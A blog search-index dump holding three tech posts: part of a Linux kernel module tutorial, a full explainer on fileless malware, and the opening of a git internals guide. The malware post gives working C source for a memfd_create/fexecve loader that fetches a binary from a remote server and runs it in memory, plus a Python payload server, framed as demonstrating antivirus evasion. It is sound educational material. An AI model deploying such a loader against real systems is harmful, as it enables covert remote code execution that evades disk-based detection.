also a part of module metadata.\nAt the end of the file, we call module_init and module_exit to tell the kernel which functions are or loading and unloading functions. This gives us the freedom to name the functions whatever we like.\n\u0026hellip; make Makefile A Makefile is required to build the kernel module — in fact, it is a special kbuild Makefile. Below is the Makefile used to build the above LKM code.\nobj-m += HelloWorld.o KDIR := /lib/modules/$(shell uname -r)/build all: $(MAKE) -C $(KDIR) M=$(PWD) modules clean: $(MAKE) -C $(KDIR) M=$(PWD) clean First line of this Makefile is called goal definition and it defines the module to be built. The rest of the Makefile is a regular makefile. Here, -C option switches the directory to the kernel directory before performing any make tasks. The M=$(PWD) variable assignment tells the make command where the actual project files exist, which helps make to return back to the project directory from kernel directory.\nAll going well, the process to build the kernel module should be straightforward, provided that you have installed the Linux headers as described earlier. The steps are as follows:\n[vagrant@centos7 task-1]$ ls HelloWorld.c Makefile README.md [vagrant@centos7 task-1]$ make make -C /lib/modules/3.10.0-1160.62.1.el7.x86_64/build M=/vagrant_data/task-1 modules make[1]: Entering directory `/usr/src/kernels/3.10.0-1160.62.1.el7.x86_64\u0026#39; CC [M] /vagrant_data/task-1/HelloWorld.o Building modules, stage 2. MODPOST 1 modules CC /vagrant_data/task-1/HelloWorld.mod.o LD [M] /vagrant_data/task-1/HelloWorld.ko make[1]: Leaving directory `/usr/src/kernels/3.10.0-1160.62.1.el7.x86_64\u0026#39; Once the module is successfully buit, we can test it by loading the module using insmod command.\n[vagrant@centos7 task-1]$ ls -l *.ko -rw-r--r--. 1 vagrant vagrant 101880 May 25 18:03 HelloWorld.ko [vagrant@centos7 task-1]$ sudo insmod HelloWorld.ko [vagrant@centos7 task-1]$ dmesg | tail -1 [35803.038855] Hello World! [vagrant@centos7 task-1]$ lsmod | head -2 Module Size Used by HelloWorld 12496 0 The metadata information coded in the LKM can be checked with modinfo command.\n[vagrant@centos7 task-1]$ modinfo HelloWorld.ko filename: /vagrant_data/task-1/HelloWorld.ko description: Eudyptula task1 author: ayedaemon license: GPL retpoline: Y rhelversion: 7.9 srcversion: 7969E1C9B651C03B53BA6B2 depends: vermagic: 3.10.0-1160.62.1.el7.x86_64 SMP mod_unload modversions At last, the module can be unloaded easily with rmmod command.\n[vagrant@centos7 task-1]$ sudo rmmod HelloWorld.ko [vagrant@centos7 task-1]$ dmesg | tail -2 [35803.038855] Hello World! [35983.753824] Bye Bye World! Conclusion Hopefully you have built your first loadable kernel module (LKM). Despite the simplicity of the functionality of this module there was a lot of material to cover — by the end of this article: you should have a broad idea of how loadable kernel modules work; you should have your system configured to build, load and unload such modules; and, you should be able to define custom parameters for your LKMs.\nJust remember that you are completely on your own in kernel land. There are no backstops or second chances for your code. If you’re quoting a project for a client, be sure to double, if not triple, the anticipated debugging time. Kernel code has to be as perfect as possible to ensure the integrity and reliability of the systems that will run it.\nIf there is no \\n character at the end of the printk() string, then the next printk() string will also be printed in dmesg. I was able to see both Hello World! and Bye Bye World at the same time when I was either loading or unloading the module.\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/html/latest/core-api/printk-basics.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nLinux kernel licensing rules - https://www.kernel.org/doc/html/latest/process/license-rules.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/05/eudyptula-task-1/","summary":"What is this? The Eudyptula Challenge is a series of programming exercises for the Linux kernel, that start from a very basic “Hello world” kernel module, moving on up in complexity to getting patches accepted into the main Linux kernel source tree.\nUnfortunately, this project is not accepting any new applicants right now. So I decided to gather tasks details from other online sources and complete them locally.\nTask-1 This is Task 01 of the Eudyptula Challenge ------------------------------------------ Write a Linux kernel module, and stand-alone Makefile, that when loaded prints to the kernel debug log level, \u0026#34;Hello World!","title":"Eudyptula Task1"},{"content":" What are file-less malwares? How do they work on linux?\nAccording to Wikipedia, file-less malware is a variant of computer related malicious software that exists exclusively as a computer memory-based artifact i.e. in RAM.\nIn other words, the malware/program is never written to harddisk but directly loaded in memory.\nTo get a better understanding of how that happens in linux, we need to understand how a normal program loads itself into memory and executes itself. If you already know this, feel free to skip next section.\nHow normal program loads and executes itself? This is a \u0026ldquo;HUGE\u0026rdquo; topic for a mere blog post. So we\u0026rsquo;ll just scratch the surface and understand about ELF files. ELF Files are main binary format in use on modern Linux systems, and support for it is implemented in the file fs/binfmt_elf.c.\nLet\u0026rsquo;s build our own C program to generate an ELF binary so we can follow and know what we are doing.\nCreate a C program file with vim not_hello_world.c, and paste the below code into it.\n#include \u0026lt;stdio.h\u0026gt; int main(int argc, char* argv[], char* envp[]) { // Prints total argument count passed to executable printf(\u0026#34;Argument count : %2d\\n\u0026#34;, argc); // Prints the arguments list along with memory location printf(\u0026#34;Arguments list :\\n\u0026#34;); for(int i=0; i\u0026lt;argc; i++) { printf(\u0026#34;\\targv[%1$d] =[ %2$p ]==\u0026gt; %2$s\\n\u0026#34;, i, argv[i]); } // Prints all the environment variables passed to executable printf(\u0026#34;Environment list :\\n\u0026#34;); for(int i=0; envp[i]; i++) { printf(\u0026#34;\\tenvp[%1$d] =[ %2$p ]==\u0026gt; %2$s\\n\u0026#34;, i, envp[i]); } } The above code will print out the argc, argv and envp values to the standard output.\nCompile it : gcc not_hello_world.c -o not_hello_world.o\nCheck file type : file not_hello_world.o\nnot_hello_world.o: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=82cad832f6d9b9a2d071be6bca3ccab87c8c71f6, for GNU/Linux 3.2.0, not stripped Run it : ./not_hello_world.o 12345 123 12345678901234567890 1234\nArgument count : 5 Arguments list : argv[0] =[ 0x7ffd3bd9370c ]==\u0026gt; ./not_hello_world.o argv[1] =[ 0x7ffd3bd93720 ]==\u0026gt; 12345 argv[2] =[ 0x7ffd3bd93726 ]==\u0026gt; 123 argv[3] =[ 0x7ffd3bd9372a ]==\u0026gt; 12345678901234567890 argv[4] =[ 0x7ffd3bd9373f ]==\u0026gt; 1234 Environment list : envp[0] =[ 0x7ffd3bd93744 ]==\u0026gt; SHELL=/bin/bash envp[1] =[ 0x7ffd3bd93754 ]==\u0026gt; LANGUAGE=en_US: envp[2] =[ 0x7ffd3bd93764 ]==\u0026gt; PWD=/home/vagrant/workspace/blog_junk envp[3] =[ 0x7ffd3bd9378a ]==\u0026gt; LOGNAME=vagrant envp[4] =[ 0x7ffd3bd9379a ]==\u0026gt; XDG_SESSION_TYPE=tty envp[5] =[ 0x7ffd3bd937af ]==\u0026gt; MOTD_SHOWN=pam envp[6] =[ 0x7ffd3bd937be ]==\u0026gt; HOME=/home/vagrant envp[7] =[ 0x7ffd3bd937d1 ]==\u0026gt; LANG=en_US.UTF-8 envp[8] =[ 0x7ffd3bd937e2 ]==\u0026gt; LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36: envp[9] =[ 0x7ffd3bd93dc4 ]==\u0026gt; SSH_CONNECTION=10.0.2.2 34954 10.0.2.15 22 envp[10] =[ 0x7ffd3bd93def ]==\u0026gt; LESSCLOSE=/usr/bin/lesspipe %s %s envp[11] =[ 0x7ffd3bd93e11 ]==\u0026gt; XDG_SESSION_CLASS=user envp[12] =[ 0x7ffd3bd93e28 ]==\u0026gt; TERM=tmux-256color envp[13] =[ 0x7ffd3bd93e3b ]==\u0026gt; LESSOPEN=| /usr/bin/lesspipe %s envp[14] =[ 0x7ffd3bd93e5b ]==\u0026gt; USER=vagrant envp[15] =[ 0x7ffd3bd93e68 ]==\u0026gt; SHLVL=1 envp[16] =[ 0x7ffd3bd93e70 ]==\u0026gt; XDG_SESSION_ID=6 envp[17] =[ 0x7ffd3bd93e81 ]==\u0026gt; XDG_RUNTIME_DIR=/run/user/1000 envp[18] =[ 0x7ffd3bd93ea0 ]==\u0026gt; SSH_CLIENT=10.0.2.2 34954 22 envp[19] =[ 0x7ffd3bd93ebd ]==\u0026gt; XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop envp[20] =[ 0x7ffd3bd93efe ]==\u0026gt; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin envp[21] =[ 0x7ffd3bd93f66 ]==\u0026gt; DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus envp[22] =[ 0x7ffd3bd93f9c ]==\u0026gt; SSH_TTY=/dev/pts/0 envp[23] =[ 0x7ffd3bd93faf ]==\u0026gt; _=./not_hello_world.o envp[24] =[ 0x7ffd3bd93fc5 ]==\u0026gt; OLDPWD=/home/vagrant/workspace This still does not gives us what is happening behind the scenes, but it tells us that each program has some dedicated memory space where it stores a copy of arguments and environment variables in continuous memory locations. To gather more information we can use the strace utility to trace the system calls made by our program.\nCommand: strace ./not_hello_world.o myarg1 myarg2 myarg3 2\u0026gt;strace_output.log 1\u0026gt;program_output.log\nNOTE:- 2(stderr) redirected to strace_output.log file and 1(stdout) redirected to program_output.log file\ncommand : cat strace_output.log\nexecve(\u0026#34;./not_hello_world.o\u0026#34;, [\u0026#34;./not_hello_world.o\u0026#34;, \u0026#34;myarg1\u0026#34;, \u0026#34;myarg2\u0026#34;, \u0026#34;myarg3\u0026#34;], 0x7ffe0dbf2cf8 /* 25 vars */) = 0 brk(NULL) = 0x5593be003000 arch_prctl(0x3001 /* ARCH_??? */, 0x7ffea24b4bc0) = -1 EINVAL (Invalid argument) access(\u0026#34;/etc/ld.so.preload\u0026#34;, R_OK) = -1 ENOENT (No such file or directory) openat(AT_FDCWD, \u0026#34;/etc/ld.so.cache\u0026#34;, O_RDONLY|O_CLOEXEC) = 3 fstat(3, {st_mode=S_IFREG|0644, st_size=28934, ...}) = 0 mmap(NULL, 28934, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff99a640000 close(3) = 0 openat(AT_FDCWD, \u0026#34;/lib/x86_64-linux-gnu/libc.so.6\u0026#34;, O_RDONLY|O_CLOEXEC) = 3 read(3, \u0026#34;\\177ELF\\2\\1\\1\\3\\0\\0\\0\\0\\0\\0\\0\\0\\3\\0\u0026gt;\\0\\1\\0\\0\\0\\360q\\2\\0\\0\\0\\0\\0\u0026#34;..., 832) = 832 pread64(3, \u0026#34;\\6\\0\\0\\0\\4\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0\u0026#34;..., 784, 64) = 784 pread64(3, \u0026#34;\\4\\0\\0\\0\\20\\0\\0\\0\\5\\0\\0\\0GNU\\0\\2\\0\\0\\300\\4\\0\\0\\0\\3\\0\\0\\0\\0\\0\\0\\0\u0026#34;, 32, 848) = 32 pread64(3, \u0026#34;\\4\\0\\0\\0\\24\\0\\0\\0\\3\\0\\0\\0GNU\\0\\t\\233\\222%\\274\\260\\320\\31\\331\\326\\10\\204\\276X\u0026gt;\\263\u0026#34;..., 68, 880) = 68 fstat(3, {st_mode=S_IFREG|0755, st_size=2029224, ...}) = 0 mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff99a63e000 pread64(3, \u0026#34;\\6\\0\\0\\0\\4\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0\u0026#34;..., 784, 64) = 784 pread64(3, \u0026#34;\\4\\0\\0\\0\\20\\0\\0\\0\\5\\0\\0\\0GNU\\0\\2\\0\\0\\300\\4\\0\\0\\0\\3\\0\\0\\0\\0\\0\\0\\0\u0026#34;, 32, 848) = 32 pread64(3, \u0026#34;\\4\\0\\0\\0\\24\\0\\0\\0\\3\\0\\0\\0GNU\\0\\t\\233\\222%\\274\\260\\320\\31\\331\\326\\10\\204\\276X\u0026gt;\\263\u0026#34;..., 68, 880) = 68 mmap(NULL, 2036952, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff99a44c000 mprotect(0x7ff99a471000, 1847296, PROT_NONE) = 0 mmap(0x7ff99a471000, 1540096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x25000) = 0x7ff99a471000 mmap(0x7ff99a5e9000, 303104, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x19d000) = 0x7ff99a5e9000 mmap(0x7ff99a634000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7ff99a634000 mmap(0x7ff99a63a000, 13528, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff99a63a000 close(3) = 0 arch_prctl(ARCH_SET_FS, 0x7ff99a63f540) = 0 mprotect(0x7ff99a634000, 12288, PROT_READ) = 0 mprotect(0x5593bdded000, 4096, PROT_READ) = 0 mprotect(0x7ff99a675000, 4096, PROT_READ) = 0 munmap(0x7ff99a640000, 28934) = 0 fstat(1, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0 brk(NULL) = 0x5593be003000 brk(0x5593be024000) = 0x5593be024000 write(1, \u0026#34;Argument count : 4\\nArguments li\u0026#34;..., 3244) = 3244 exit_group(0) = ? +++ exited with 0 +++ At first it looks confusing and very difficult to understand, but is very simple and straight forward once you have understood the format of this output.\n# Format of the strace output. syscall(arg1, arg2, arg3, ... ) = Return value Now if we look at line-1 of the strace_output.log file, with the newly gained insight. It is very clear that we are calling execve syscall and passing arguments to it.\nAccording to man 2 execve \u0026ndash;\u0026gt; execve() executes the program referred to by pathname. This causes the program that is currently being run by the calling process to be replaced with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments.\nThis concludes that the execve() syscall is actually responsible to load the executable ELF file into memory!! Interestingly, our binary reads (gathers) all the data to be printed from multiple locations and then print it at once at end with a single write() syscall. The return value for write() denotes the number of bytes the syscall wrote. This is the exact amount of chars that was supposed to be written out on stdout but we redirected it to a file. Now we can check if the byte counts are same or not.\nWe can check if the byte counts in the file match the byte count returned by write() syscall, using \u0026ndash;\u0026gt; wc -c program_output.log\noutput:\n3244 program_output.log With this, we know how a normal program executes in Memory. Below diagram summarizes it for a quick recap.\nC program │ │ │ Compiles │ ▼ ELF binary │ │ │ execve │ ▼ loaded in memory Idea of file-less? In usual scenarios, we have a compiled malicious binary stored on the victim\u0026rsquo;s machine, that\u0026rsquo;s then executed somehow for the malicious purpose of the attacker. Here we have multiple simpler methods and tools to analyze the binary and know what it is going to do. Most of the times, our antivirus can scan system\u0026rsquo;s harddisk and know if there is a malware or a not.\nAnd we all trust our anti-virus for that!! 😜\nBut what if an attacker somehow loaded the ELF file directly into the memory, without writing it to harddisk (not even a temp file). In linux, one of the way to do that is via memfd_create() syscall. This creates an \u0026ldquo;anonymous file\u0026rdquo; and returns a \u0026ldquo;file descriptor\u0026rdquo; to it.\nOK! This had me with the first line of the man page - man 2 memfd_create. But there is more to it.\nmemfd_create() creates an anonymous file and returns a file descriptor that refers to it. The file behaves like a regular file, and so can be modified, truncated, memory-mapped, and so on. However, unlike a regular file, it lives in RAM and has a volatile backing storage. Once all references to the file are dropped, it is automatically released. Anonymous memory is used for all backing pages of the file. Therefore, files created by memfd_create() have the same semantics as other anonymous memory allocations such as those allocated using mmap(2) with the MAP_ANONYMOUS flag. We can now create a file directly in RAM all we need is a way to execute it. We could have used same old execve for this but we don\u0026rsquo;t have a file pathname to begin with. After looking through the variants of the exec family syscalls, I stumbled upon fexecve() - execute program specified via file descriptor.\nNow we have both, a way to create in memory files by memfd_create() and execute it with fexecve(). We just need a program to glue everything together with a neat logic to make things work the way you want it.\nFirst fileless program in C I\u0026rsquo;ve written a simple C program (loader.c) that creates an in-memory file and copies the data of a (local) binary to it. And then executes it. Simple, isn\u0026rsquo;t it.\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;sys/mman.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; #include \u0026lt;errno.h\u0026gt; #include \u0026lt;string.h\u0026gt; #define _GNU_SOURCE /* See feature_test_macros(7) */ #define BUFF_SIZE 1024 int memfd_create(const char *name, unsigned int flags); // Prints usage of the program - takes program name as argument - argv[0] void usage(char* prog) { char *use = \u0026#34;USAGE: %1$s /path/to/binary arg_to_binary1 arg_to_binary2 ...\\n\u0026#34;; printf(use, prog); } // Prints error message and the error number message; exits with errno. void die(char* msg) { printf(\u0026#34;[ - ] %s\\n\u0026#34;, msg); printf(\u0026#34;[ ? ] %s\u0026#34;, strerror(errno)); exit(errno); } int main(int argc, char* argv[], char* envp[]) { int fd1, fd2; char buff[BUFF_SIZE] = {0}; // Creates a buffer with all values as 0; if (argc \u0026lt; 2) { // Checks if any argument is passed or not. usage(argv[0]); exit(1); } // Create mem file (fd1) printf(\u0026#34;[ * ] Trying to create a mem file...\\n\u0026#34;); fd1 = memfd_create(\u0026#34;testfd\u0026#34;, 0); if (fd1 \u0026lt; 0) die(\u0026#34;Can\u0026#39;t create memfd file\u0026#34;); printf(\u0026#34;[ + ] Created mem file and attached to fd = %d\\n\u0026#34;, fd1); // Read a local binary (fd2) and write to mem file (fd1) printf(\u0026#34;[ * ] Reading %s file\\n\u0026#34;, argv[1]); if ((fd2 = open(argv[1], O_RDONLY)) == -1) die(\u0026#34;Can\u0026#39;t open file\u0026#34;); printf(\u0026#34;\\n ----------------------------------- \\n\u0026#34;); int i = 0, j = 0; int read_count = 0, write_count = 0; while( (read_count = read(fd2, buff, BUFF_SIZE)) != 0 ) { if( (write_count = write(fd1, buff, read_count)) == -1) die(\u0026#34;Failed to write to mem file\u0026#34;); i += read_count; j += write_count; printf(\u0026#34;\\rRead count = %6d | Write count = %3d\u0026#34;, i, j); } printf(\u0026#34;\\n ----------------------------------- \\n\u0026#34;); printf(\u0026#34;[ + ] Starting execution...\\n\u0026#34;); // Change argv params; removes the argv[0] // printf(\u0026#34;%s %s %s %s\\n\u0026#34;, argv[0], argv[1], argv[2], argv[3]); for(int i=0; i\u0026lt;argc; ++i) argv[i] = argv[i+1]; // printf(\u0026#34;%s %s %s %s\\n\u0026#34;, argv[0], argv[1], argv[2], argv[3]); // Execute fd1 - with new argv and same envp fexecve(fd1, argv, envp); // If fexecve returns, then it is failed. printf(\u0026#34;Failed Executing....\\n\u0026#34;); return errno; } We should give some time to understand this code on why and how it\u0026rsquo;ll load what in memory.\nWe can compile this code to generate an ELF file with gcc loader.c -o loader.o; Once compiled, we can run it with ./loader.o\nSince there are no arguments(argc\u0026lt;2), it should fail with usage information on stdout.\nUSAGE: ./loader.o /path/to/binary arg_to_binary1 arg_to_binary2 ... Let\u0026rsquo;s try again with some arguments this time.\n./loader.o /usr/bin/file loader.o This time things will not be same as last time. It\u0026rsquo;ll :-\nCreates an in-memory file and gets a file descriptor back (fd1). Opens local binary file (argv[1] = /usr/bin/file); Stores this file descriptor in fd2. Read-write loop until everything from fd2 is written in fd1. Change argv to be passed to in-mem file. The new argv value should look like \u0026ndash;\u0026gt; /usr/bin/file arg1 arg2 arg3. This means we just have to remove the argv[0] and set everything remaining in proper index values. Execute fd1 \u0026ndash;\u0026gt; in-memory file. Output:\n[ * ] Trying to create a mem file... [ + ] Created mem file and attached to fd = 3 [ * ] Reading /usr/bin/file file ----------------------------------- Read count = 27104 | Write count = 27104 ----------------------------------- [ + ] Starting execution... loader.o: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=426a7743592788cd18c92a76f22ccfb632700d7b, for GNU/Linux 3.2.0, with debug_info, not stripped Last line of the output is the proof that our in-memory file executed successfully\u0026hellip; Now we can take it to next level.\nloading binary from network Till this point, we know how to write a basic code to load a local binary, create a in-mem file for it and then execute it.\nBut an attacker won\u0026rsquo;t just use it run the local binaries which can be executed directly, instead he would like to execute a binary sitting on his server and load that into victim\u0026rsquo;s system directly in memory. This will not be detected with the help of any disk analysis tool or commands like ls. Also, this will be executing safe from \u0026ldquo;Anti-Virus\u0026rdquo; software complete disk-scan features. In theory, attacker could run anything from his system on victim\u0026rsquo;s system without leaving any trace on harddisk.\nTo simulate this, I\u0026rsquo;ve created a pre-setup with a server that hosts a malicious binary and victim\u0026rsquo;s system where we have the loader.o present.\nWithout further ado, let\u0026rsquo;s get things prepared for out test. We need 3 things:\nloader binary (on victim\u0026rsquo;s machine) malicious binary (on attacker\u0026rsquo;s machine) tcp socket server to host malicious binary (on attacker\u0026rsquo;s machine) I started out with a (not so) malicious binary, which simply creates a plain-text file when executed.\nSource Code: malicious_program.c\n#include \u0026lt;stdio.h\u0026gt; int main() { char* data = \u0026#34;This malicious program wishes you to have a good day!!\u0026#34;; FILE* fPtr = fopen(\u0026#34;NOTICE_for_U.txt\u0026#34;, \u0026#34;w\u0026#34;); if(!fPtr) return 1; fputs(data, fPtr); fclose(fPtr); return 0; } Compile it -\u0026gt; gcc malicious_program.c -o malicious_program.o\nNext, I wrote a small python tcp socket server that will host the malicious_program.o binary.\nSource Code: python_server.py\n# Read binary with open(\u0026#34;malicious_program.o\u0026#34;, \u0026#34;rb\u0026#34;) as f: data = f.read() print(len(data)) # Host it on 192.168.56.56:1234 import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((\u0026#39;192.168.56.56\u0026#39;, 1234)) s.listen(1) conn, addr = s.accept() print(conn, addr) # Prints the incoming Connection details conn.sendall(data) conn.close() Finally, we modify the previous local binary loader code to read from connected socket instead of a local binary.\nSource code: network_loader.c\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;sys/mman.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;sys/socket.h\u0026gt; #include \u0026lt;arpa/inet.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; #include \u0026lt;errno.h\u0026gt; #include \u0026lt;string.h\u0026gt; #define _GNU_SOURCE /* See feature_test_macros(7) */ #define BUFF_SIZE 1024 int memfd_create(const char *name, unsigned int flags); void usage(char* prog) { char *use = \u0026#34;USAGE: %1$s Destination Port ...\\n\u0026#34;; printf(use, prog); } void die(char* msg) { printf(\u0026#34;[ - ] %s\\n\u0026#34;, msg); printf(\u0026#34;[ ? ] %s\u0026#34;, strerror(errno)); exit(errno); } int main(int argc, char* argv[], char* envp[]) { int fd1; char buff[BUFF_SIZE] = {0}; if (argc \u0026lt; 2) { usage(argv[0]); exit(1); } // Create mem file (fd1) printf(\u0026#34;[ * ] Trying to create a mem file...\\n\u0026#34;); fd1 = memfd_create(\u0026#34;testfd\u0026#34;, 0); if (fd1 \u0026lt; 0) die(\u0026#34;Can\u0026#39;t create memfd file\u0026#34;); printf(\u0026#34;[ + ] Created mem file and attached to fd = %d\\n\u0026#34;, fd1); // Socket stuff begins here struct sockaddr_in serv_addr; int sock = 0; if ((sock = socket(AF_INET, SOCK_STREAM, 0)) \u0026lt; 0) die(\u0026#34;Socket not created\u0026#34;); serv_addr.sin_family = AF_INET; serv_addr.sin_port = htons(strtol(argv[2], NULL, 10)); // set port if(inet_pton(AF_INET, argv[1], \u0026amp;serv_addr.sin_addr)\u0026lt;=0) // set address die(\u0026#34;Invalid address\u0026#34;); if (connect(sock, (struct sockaddr *)\u0026amp;serv_addr, sizeof(serv_addr)) \u0026lt; 0) // connect die(\u0026#34;Connection failed\u0026#34;); printf(\u0026#34;\\n ----------------------------------- \\n\u0026#34;); int i = 0, j = 0; int read_count = 0, write_count = 0; while( (read_count = read( sock , buff, BUFF_SIZE)) != 0 ) { if( (write_count = write(fd1, buff, read_count)) == -1) die(\u0026#34;Failed to write to mem file\u0026#34;); i += read_count; j += write_count; printf(\u0026#34;\\rRead count = %6d | Write count = %3d\u0026#34;, i, j); } printf(\u0026#34;\\n ----------------------------------- \\n\u0026#34;); printf(\u0026#34;[ + ] Starting execution...\\n\u0026#34;); // Change argv params // printf(\u0026#34;BEFORE: %s %s %s %s\\n\u0026#34;, argv[0], argv[1], argv[2], argv[3]); for(int i=0; i\u0026lt;argc; ++i) argv[i] = argv[i+1]; // printf(\u0026#34;AFTER: %s %s %s %s\\n\u0026#34;, argv[0], argv[1], argv[2], argv[3]); // Execute fd1 - with new argv fexecve(fd1, argv, envp); // If fexecve returns, then it is failed. printf(\u0026#34;Failed Executing....\\n\u0026#34;); return errno; } Compile it \u0026ndash;\u0026gt; gcc network_loader.c -o network_loader.o\nWith this, we have everything ready with us. Some more steps and we are done.\nStart the python server on attacker\u0026rsquo;s machine. - python3 python_server.py Place the network_loader.o on victim\u0026rsquo;s machine. Politely ask the victim to execute the binary - ./network_loader.o 192.168.56.56 1234 Sit back and enjoy! ## On Attacker\u0026#39;s machine $ python3 python_server.py 16800 \u0026lt;socket.socket fd=4, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0, laddr=(\u0026#39;192.168.56.56\u0026#39;, 1234), raddr=(\u0026#39;192.168.56.56\u0026#39;, 50812)\u0026gt; (\u0026#39;192.168.56.56\u0026#39;, 50812) ## on victim\u0026#39;s machine $ ./network_loader.o 192.168.56.56 1234 [ * ] Trying to create a mem file... [ + ] Created mem file and attached to fd = 3 ----------------------------------- Read count = 16800 | Write count = 16800 ----------------------------------- [ + ] Starting execution... And if we check the victim\u0026rsquo;s working directory we can see a file with name NOTICE_for_U.txt there\u0026hellip;. which confirms that the remote binary successfully ran on victim\u0026rsquo;s machine.\nVoila! We just executed a remotely located binary without leaving anytrace on harddisk for further analysis. What we have is a loader binary that reads unknown data from somewhere and just executes it. And there is nothing in the loader binary that could be detected as malicious by most of the automated analysis tools\u0026hellip; even VirusTotal does not detect it for what it is.\nCVE-2021-4038 describes as a local privilege escalation vulnerability that was found on polkit\u0026rsquo;s pkexec utility. I\u0026rsquo;m not sure if it is a false positive or based on similar signatures.\nReferences How programs get run: ELF binaries (lwn.net) Chapter 3 - Memory Management (tldp.org) Fileless Malwares (wikipedia.org) what is fileless malware (norton.com) covert code faces a heap of trouble in memory (sophos.com) Intelligence: File less threats (microsoft.com) ","permalink":"https://ayedaemon.github.io/post/2022/02/fileless-malwares-how-and-why/","summary":"What are file-less malwares? How do they work on linux?\nAccording to Wikipedia, file-less malware is a variant of computer related malicious software that exists exclusively as a computer memory-based artifact i.e. in RAM.\nIn other words, the malware/program is never written to harddisk but directly loaded in memory.\nTo get a better understanding of how that happens in linux, we need to understand how a normal program loads itself into memory and executes itself.","title":"File-less malwares: what and how"},{"content":" Inside out approach to learn git\nGit is one of the most common version control system used today. And the fact that it was developed by the kernel developers justifies that it is very complex and have a very bad interface. And most of the commands don\u0026rsquo;t make much of a sense at first.\nBut behind the scenes git uses a bunch of tricks in different combinations to make everything work. And once you understand them all the git commands start making much more sense than ever. For this we need to understand the git internals. (There is a lot to the git internals but we are just going to cover a few of them)\nUnderstanding git internals To understand this, we first need to create a git repository and start working on it. For that, I have created a simple folder play-git here to start playing around. This is usually referred as working area or working repository or working directory.\nNext step after this will be creating/initializing a git repository. This can be done using git init command in the working directory.\n[ OUTPUT ]:\nInitialized empty Git repository in /home/ayedaemon/extra/playground/play-git/.git/ This will create a .git folder in my working repo as indicated by the output of git init command (above).\nThis .git folder is generally called git repository. This is the place where all of the git magic resides. 